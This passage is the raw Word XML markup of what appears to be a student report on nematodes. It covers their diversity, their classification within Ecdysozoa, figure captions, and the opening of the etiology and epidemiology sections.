          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Jawad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fourth year 2014-2015</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial" w:hint="cs"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
        <w:t>احمد محمد جواد</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial" w:hint="cs"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
        <w:t>المرحلة الرابعة 2014-2015</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="00F55303">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NEMATODES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">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t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">There are thousands of nematodes. Not only are there more than 15,000 known species of roundworms, but there are many thousands of individual nematodes in even a single handful of garden soil. And they keep coming! Some species of roundworm may contain more than 27 million eggs at one time and lay more than 200,000 of them in a single day. Some scientists have estimated that there may be as many as half a million more </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unkown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> species of roundworm yet to be discovered, an estimate based on the fact that many new species are still being discovered, that relatively few people are looking for more species, and that most roundworms look pretty much alike. If the estimated number of species is anywhere close to correct, it would mean that roundworms are the second most diverse group of animals, trailing behind only the arthropods.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="00054F74">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nematodes were once classified with a very large and heterogeneous cluster of </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>animals</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> grouped together on the basis of their overall worm-like appearance, simple structure of an internal body cavity called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pseudocoelom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the lack of features such as cilia and a well-defined head that are found in most animals. This group, variously known as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Aschelminths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pseudocoelomata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, is today no longer recognized as a natural one. It is quite likely that the simple body plan of these organisms has resulted from reduction and simplification from more than one group of ancestral organisms, and so the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pseudocoelom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is neither a uniquely derived nor useful character. (Wallace, Ricci, &amp; Malone 1996) The simplicity is thus a result of secondary simplification from a more complex body design, and not necessarily an indication of primitive or simple origins. Current studies indicate that nematodes are actually related to the </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>arthropods</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00054F74" w:rsidRPr="000E2510">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>priapulids</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> in a newly recognized group, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ecdysozoa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59" w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B3C59" w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00F24214" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24214">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:397.8pt;height:1.5pt" o:hrpct="850" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="75" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4125"/>
        <w:gridCol w:w="5475"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidTr="001C19A1">
        <w:trPr>
          <w:tblCellSpacing w:w="75" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="001C19A1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E2510">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2476500" cy="2619375"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="9" name="صورة 9" descr="nematode micr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atode micrograph">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619375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="001C19A1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E2510">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3333750" cy="2619375"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="10" name="صورة 10" descr="Nematode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atode cross-section">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19375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Roundworms :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The image at left shows a living microscopic roundworm as viewed with an Environmental SEM. The worm is approximately one millimeter long. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>At right, a diagrammatic view of the internal anatomy of a roundworm, showing the simplicity of its organization.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> See text below for discussion. (Click on either of the pictures above for a larger image).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230979" w:rsidRPr="000E2510" w:rsidRDefault="00F24214" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24214">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:397.8pt;height:1.5pt" o:hrpct="850" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="black" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">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t>Etiology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">A nematode is an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unsegmented</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> worm belonging to the phylum </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nematoda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. They are the most numerous</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> multicellular animals on earth. The body of a nematode is elongated and cylindrical. Most nematodes are tiny and live in huge numbers in soil, water, plants and animals. Nematodes such as roundworm, pinworm and hookworm are parasites that live in the blood and lymphatic system </w:t>
      </w:r>
      <w:r w:rsidR="00054F74" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">and cause different </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">types </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ofdisease</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:hAnsi="Museo Sans 300"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Epidemiology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="007F3321">
      <w:pPr>
        <w:numPr>
